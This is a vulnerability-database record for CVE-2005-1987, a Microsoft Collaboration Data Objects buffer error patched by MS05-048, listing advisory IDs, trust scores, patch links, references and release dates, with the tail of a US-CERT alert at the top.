\u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122\u003e\n\n     * CAN-2005-2128 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128\u003e\n\n     * CAN-2005-2119 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119\u003e\n\n     * CAN-2005-1978 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978\u003e\n\n     * CAN-2005-2127 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127\u003e\n\n     * CAN-2005-0163 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163\u003e\n\n     * Microsoft Update - \u003chttps://update.microsoft.com/microsoftupdate\u003e\n\n\n  _________________________________________________________________\n\n   The most recent version of this document can be found at:\n\n   \u003chttp://www.us-cert.gov/cas/techalerts/TA05-284A.html\u003e \n  _________________________________________________________________\n\n   Feedback can be directed to US-CERT.  Please send email to:\n   \u003ccert@cert.org\u003e with \"TA05-284A Feedback VU#959049\" in the subject. \n  _________________________________________________________________\n\n   Revision History\n\n   Oct 11, 2004: Initial release\n  _________________________________________________________________\n\n   Produced 2005 by US-CERT, a government organization. \n  \n   Terms of use\n\n   \u003chttp://www.us-cert.gov/legal.html\u003e\n  _________________________________________________________________\n\n   For instructions on subscribing to or unsubscribing from this \n   mailing list, visit \u003chttp://www.us-cert.gov/cas/\u003e. \n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc\nbqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK\nPdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c\n1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe\n/9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM\nMUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog==\n=5hXu\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-1987"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220"
      },
      {
        "db": "CERT/CC",
        "id": "VU#883460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      },
      {
        "db": "BID",
        "id": "15067"
      },
      {
        "db": "PACKETSTORM",
        "id": "40623"
      },
      {
        "db": "PACKETSTORM",
        "id": "40726"
      },
      {
        "db": "PACKETSTORM",
        "id": "40674"
      },
      {
        "db": "PACKETSTORM",
        "id": "40619"
      }
    ],
    "trust": 6.57
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#883460",
        "trust": 3.3
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1987",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "15067",
        "trust": 2.7
      },
      {
        "db": "USCERT",
        "id": "TA05-284A",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "17167",
        "trust": 2.4
      },
      {
        "db": "CERT/CC",
        "id": "VU#959049",
        "trust": 1.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526",
        "trust": 1.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372",
        "trust": 1.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1015038",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1015039",
        "trust": 1.6
      },
      {
        "db": "OSVDB",
        "id": "19905",
        "trust": 1.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220",
        "trust": 0.9
      },
      {
        "db": "SECUNIA",
        "id": "17161",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516",
        "trust": 0.9
      },
      {
        "db": "SECUNIA",
        "id": "16373",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "14594",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "21895",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1014727",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "16480",
        "trust": 0.8
      },
      {
        "db": "OSVDB",
        "id": "19902",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "22473",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "15057",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "21193",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "14087",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "15891",
        "trust": 0.8
      },
      {
        "db": "OSVDB",
        "id": "17680",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1014329",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "40623",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "40726",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "40674",
        "trust": 0.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#180868",
        "trust": 0.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#214572",
        "trust": 0.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#922708",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "40619",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220"
      },
      {
        "db": "CERT/CC",
        "id": "VU#883460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "BID",
        "id": "15067"
      },
      {
        "db": "PACKETSTORM",
        "id": "40623"
      },
      {
        "db": "PACKETSTORM",
        "id": "40726"
      },
      {
        "db": "PACKETSTORM",
        "id": "40674"
      },
      {
        "db": "PACKETSTORM",
        "id": "40619"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1987"
      }
    ]
  },
  "id": "VAR-200510-0005",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2026-04-10T22:24:42.611000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "MS05-048",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx"
      },
      {
        "title": "MS05-048",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/ms05-048.mspx"
      },
      {
        "title": "Microsoft Windows  and Microsoft Exchange Server Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113625"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-1987"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.us-cert.gov/cas/techalerts/ta05-284a.html"
      },
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/15067"
      },
      {
        "trust": 2.4,
        "url": "http://www.kb.cert.org/vuls/id/883460"
      },
      {
        "trust": 1.6,
        "url": "http://www.kb.cert.org/vuls/id/959049"
      },
      {
        "trust": 1.6,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
      },
      {
        "trust": 1.6,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1420"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1201"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/17167"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a848"
      },
      {
        "trust": 1.6,
        "url": "http://securitytracker.com/id?1015038"
      },
      {
        "trust": 1.6,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1515"
      },
      {
        "trust": 1.6,
        "url": "http://securitytracker.com/id?1015039"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1406"
      },
      {
        "trust": 1.6,
        "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a581"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.osvdb.org/19905"
      },
      {
        "trust": 1.6,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
      },
      {
        "trust": 1.6,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1130"
      },
      {
        "trust": 1.0,
        "url": "http://support.microsoft.com/default.aspx?scid=kb%3b%5bln%5d%3bq907245"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-051.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/com/default.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/159621"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/216434"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/archive/1/391803"
      },
      {
        "trust": 0.8,
        "url": "http://www.kb.cert.org/vuls/id/939605"
      },
      {
        "trust": 0.8,
        "url": "http://www.kb.cert.org/vuls/id/740372"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/16373/"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-050.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://eeye.com/html/research/advisories/ad20051011a.html"
      },
      {
        "trust": 0.8,
        "url": "about vulnerability notes"
      },
      {
        "trust": 0.8,
        "url": "contact us about this vulnerability"
      },
      {
        "trust": 0.8,
        "url": "provide a vendor statement"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.kb.cert.org/vuls/id/680526"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/16480/"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/14594"
      },
      {
        "trust": 0.8,
        "url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/21895"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/17161"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/15057"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/22473"
      },
      {
        "trust": 0.8,
        "url": "http://osvdb.org/displayvuln.php?osvdb_id=19902"
      },
      {
        "trust": 0.8,
        "url": "http://www.f-secure.com/weblog/archives/archive-122005.html#00000737"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.sec-consult.com/184.html"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/15891/ "
      },
      {
        "trust": 0.8,
        "url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/14087"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/21193"
      },
      {
        "trust": 0.8,
        "url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-1987"
      },
      {
        "trust": 0.8,
        "url": "http://www.frsirt.com/english/advisories/2005/2045"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta05-284a/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta05-284a/"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-1987"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/17167/"
      },
      {
        "trust": 0.6,
        "url": "http://support.microsoft.com/default.aspx?scid=kb;[ln];q907245"
      },
      {
        "trust": 0.5,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx"
      },
      {
        "trust": 0.3,
        "url": "http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=bltndetail\u0026documentoid=361442\u0026renditionid="
      },
      {
        "trust": 0.3,
        "url": "..."
      },
      {
        "trust": 0.3,
        "url": "/archive/1/413159"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-1987"
      },
      {
        "trust": 0.2,
        "url": "http://www.sec-1.com/applied_hacking_course.html"
      },
      {
        "trust": 0.2,
        "url": "http://www.sec-1.com"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org),"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=1ff26142-6e1e-4e17-9dcd-994b339a69cf"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=554a86a5-0b03-4ca9-a32d-642e40570424"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=a6ec1352-042e-4ffb-b379-0e1c06ab9dbe"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/21/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1176/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1177/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=ca202ccc-792e-4462-9a2f-a20d1f8607f7"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=20f79ce7-d4db-42d7-8e57-58656a3fb2f7"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/22/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1175/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/16/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=4e5b96d8-ba74-4008-80d9-922364abc6ac"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/20/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1173/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1174/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/17161/"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/883460\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1987\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2119\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1978\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://update.microsoft.com/microsoftupdate\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2128"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/180868\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2127\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2122"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/214572\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2119"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/959049\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/680526\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2122\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/950516\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-1978"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2128\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2120"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/922708\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-0163\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/995220\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2120\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/techalerts/ta05-284a.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/legal.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2127"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220"
      },
      {
        "db": "CERT/CC",
        "id": "VU#883460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "BID",
        "id": "15067"
      },
      {
        "db": "PACKETSTORM",
        "id": "40623"
      },
      {
        "db": "PACKETSTORM",
        "id": "40726"
      },
      {
        "db": "PACKETSTORM",
        "id": "40674"
      },
      {
        "db": "PACKETSTORM",
        "id": "40619"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1987"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#680526",
        "ident": null
      },
      {
        "db": "CERT/CC",
        "id": "VU#995220",
        "ident": null
      },
      {
        "db": "CERT/CC",
        "id": "VU#883460",
        "ident": null
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372",
        "ident": null
      },
      {
        "db": "CERT/CC",
        "id": "VU#950516",
        "ident": null
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605",
        "ident": null
      },
      {
        "db": "BID",
        "id": "15067",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "40623",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "40726",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "40674",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "40619",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000592",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1987",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2005-08-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#680526",
        "ident": null
      },
      {
        "date": "2005-10-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#995220",
        "ident": null
      },
      {
        "date": "2005-10-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#883460",
        "ident": null
      },
      {
        "date": "2005-08-18T00:00:00",
        "db": "CERT/CC",
        "id": "VU#740372",
        "ident": null
      },
      {
        "date": "2005-10-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#950516",
        "ident": null
      },
      {
        "date": "2005-07-02T00:00:00",
        "db": "CERT/CC",
        "id": "VU#939605",
        "ident": null
      },
      {
        "date": "2005-10-11T00:00:00",
        "db": "BID",
        "id": "15067",
        "ident": null
      },
      {
        "date": "2005-10-12T01:58:20",
        "db": "PACKETSTORM",
        "id": "40623",
        "ident": null
      },
      {
        "date": "2005-10-15T00:40:55",
        "db": "PACKETSTORM",
        "id": "40726",
        "ident": null
      },
      {
        "date": "2005-10-12T18:16:30",
        "db": "PACKETSTORM",
        "id": "40674",
        "ident": null
      },
      {
        "date": "2005-10-12T01:55:17",
        "db": "PACKETSTORM",
        "id": "40619",
        "ident": null
      },
      {
        "date": "2005-10-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200510-082",
        "ident": null
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000592",
        "ident": null
      },
      {
        "date": "2005-10-13T10:02:00",
        "db": "NVD",
        "id": "CVE-2005-1987",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2007-10-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#680526",
        "ident": null
      },
      {
        "date": "2005-10-14T00:00:00",
        "db": "CERT/CC",
        "id": "VU#995220",
        "ident": null
      },
      {
        "date": "2005-10-14T00:00:00",
        "db": "CERT/CC",
        "id": "VU#883460",
        "ident": null
      },
      {
        "date": "2005-10-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#740372",
        "ident": null
      },
      {
        "date": "2005-12-15T00:00:00",
        "db": "CERT/CC",
        "id": "VU#950516",
        "ident": null
      },
      {
        "date": "2005-07-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#939605",
        "ident": null
      },
      {
        "date": "2009-07-12T17:56:00",
        "db": "BID",
        "id": "15067",
        "ident": null
      },
      {
        "date": "2020-04-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200510-082",
        "ident": null
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000592",
        "ident": null
      },
      {
        "date": "2025-04-03T01:03:51.193000",
        "db": "NVD",
        "id": "CVE-2005-1987",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "40619"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "Microsoft Internet Explorer can use any COM object",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200510-082"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2005-1987 (GCVE-0-2005-1987)

FKIE_CVE-2005-1987

GHSA-PFWW-HW2Q-8MC3

GSD-2005-1987

VAR-200510-0005

import no_namespace rename("EOF", "adoEOF")

import rename_namespace("CDO")

include

Tags

Sightings

Nomenclature